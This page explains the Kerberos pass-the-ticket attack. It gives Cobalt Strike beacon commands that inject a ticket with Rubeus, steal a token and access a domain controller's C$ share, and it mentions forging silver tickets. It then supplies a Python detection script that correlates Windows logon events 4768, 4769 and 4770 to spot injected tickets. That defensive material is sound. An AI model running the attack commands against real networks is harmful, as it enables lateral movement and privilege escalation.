The pass-the-ticket attack uses an intercepted or dumped Kerberos service ticket to authenticate against a service.

Requirements

  • Admin privileges/credentials
    • Dumping a service ticket does not require admin privileges; dumping a TGT does.
  • Connection to the SMB Admin$ share

The attacker can reuse the ticket elsewhere where it is valid, or crack the service account's password (Kerberoasting) and use kerberos::golden to create a silver ticket for lateral movement and privilege escalation on the remote machine.

Example

Example with a Cobalt Strike beacon and Rubeus:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
beacon> steal_token $pid # process must be under the target (i.e. ticket's) username
beacon> ls \\DC1\c$ # do stuff with ticket/token
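From the defender's side, a ticket that was injected into a logon session (as the Rubeus ptt step above does) is used against services without that host ever having asked the domain controller for a TGT. The following Python snippet is an added detection example, not part of the original page and not Rubeus or Cobalt Strike code: it correlates Security log events 4768/4770 (TGT requested/renewed) with 4769 (service ticket requested) and flags service-ticket requests from a user/source-IP pair that has no TGT request within the ticket lifetime. The event dicts, field names (ts, id, user, ip, service) and sample values are constructed assumptions; in practice they would be extracted from events collected from every DC in the domain, since the TGT may have been issued by a different DC than the one serving the 4769.

```python
from datetime import datetime, timedelta

# Default Kerberos TGT lifetime in AD is 10 hours; set this to your domain policy.
TGT_LIFETIME = timedelta(hours=10)

# Constructed sample events (assumption, not from the page), shaped like fields
# pulled from Windows Security events 4768 (TGT requested), 4770 (TGT renewed)
# and 4769 (service ticket requested), already merged from all DCs.
SAMPLE_EVENTS = [
    {"ts": "2024-03-01T08:00:00", "id": 4768, "user": "alice", "ip": "10.0.0.5"},
    {"ts": "2024-03-01T08:00:03", "id": 4769, "user": "alice", "ip": "10.0.0.5", "service": "cifs/FS1"},
    # svc_backup requests service tickets from 10.0.0.9 but never obtained a TGT there
    {"ts": "2024-03-01T09:15:00", "id": 4769, "user": "svc_backup", "ip": "10.0.0.9", "service": "cifs/DC1"},
    {"ts": "2024-03-01T09:16:00", "id": 4769, "user": "svc_backup", "ip": "10.0.0.9", "service": "ldap/DC1"},
    # bob's TGT is older than the lifetime when the service ticket is requested
    {"ts": "2024-03-01T07:00:00", "id": 4768, "user": "bob", "ip": "10.0.0.12"},
    {"ts": "2024-03-01T18:30:00", "id": 4769, "user": "bob", "ip": "10.0.0.12", "service": "cifs/FS1"},
]


def parse_ts(value):
    """Parse the ISO-8601 timestamp used in the sample events."""
    return datetime.fromisoformat(value)


def find_tickets_without_tgt(events, lifetime=TGT_LIFETIME):
    """Return the 4769 events whose (user, source IP) pair has no 4768/4770
    within `lifetime` before the service ticket request.

    Heuristic: a legitimately logged-on host obtains a TGT before any service
    ticket; an injected ticket skips that step. TGT renewals (4770) refresh the
    window so long-lived sessions are not flagged.
    """
    ordered = sorted(events, key=lambda e: parse_ts(e["ts"]))
    last_tgt = {}  # (user, ip) -> timestamp of the most recent TGT request/renewal
    suspicious = []
    for event in ordered:
        when = parse_ts(event["ts"])
        key = (event["user"].lower(), event["ip"])
        if event["id"] in (4768, 4770):
            last_tgt[key] = when
        elif event["id"] == 4769:
            seen = last_tgt.get(key)
            if seen is None or when - seen > lifetime:
                suspicious.append(event)
    return suspicious


def summarize(suspicious):
    """Group flagged events into one finding per (user, ip), listing the
    services requested, so an analyst reviews hosts rather than single rows."""
    findings = {}
    for event in suspicious:
        key = (event["user"].lower(), event["ip"])
        findings.setdefault(key, []).append(event["service"])
    return findings


if __name__ == "__main__":
    for (user, ip), services in summarize(find_tickets_without_tgt(SAMPLE_EVENTS)).items():
        print(f"{user}@{ip}: service tickets without a recent TGT request: {', '.join(services)}")
```

Expect false positives from hosts whose TGT was issued before the log collection window started, from clock skew between DCs, and from cross-realm trusts where the TGT was issued by another domain's KDC; treat a hit as a lead to check the host's logon sessions (for example, a session whose cached tickets belong to a different account than the one that owns the session) rather than as a verdict.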